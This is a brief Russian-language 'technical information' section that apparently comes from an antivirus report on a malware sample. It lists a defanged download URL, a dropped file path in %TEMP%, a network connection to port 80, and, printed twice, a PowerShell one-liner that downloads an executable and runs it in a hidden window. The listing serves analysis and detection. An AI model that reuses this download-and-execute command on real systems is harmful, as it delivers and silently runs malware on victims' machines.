Техническая информация
- http://18#.#1.113.94/jun8.exe как %temp%\zjuqsxy.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://18#.#1.113.94/jun8.exe','%TMP%\Zjuqsxy.exe');Start-Process '%TMP%\Zjuqsxy.exe';
- '18#.#1.113.94':80
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://18#.#1.113.94/jun8.exe','%TMP%\Zjuqsxy.exe');Start-Process '%TMP%\Zjuqsxy.exe';' (со скрытым окном)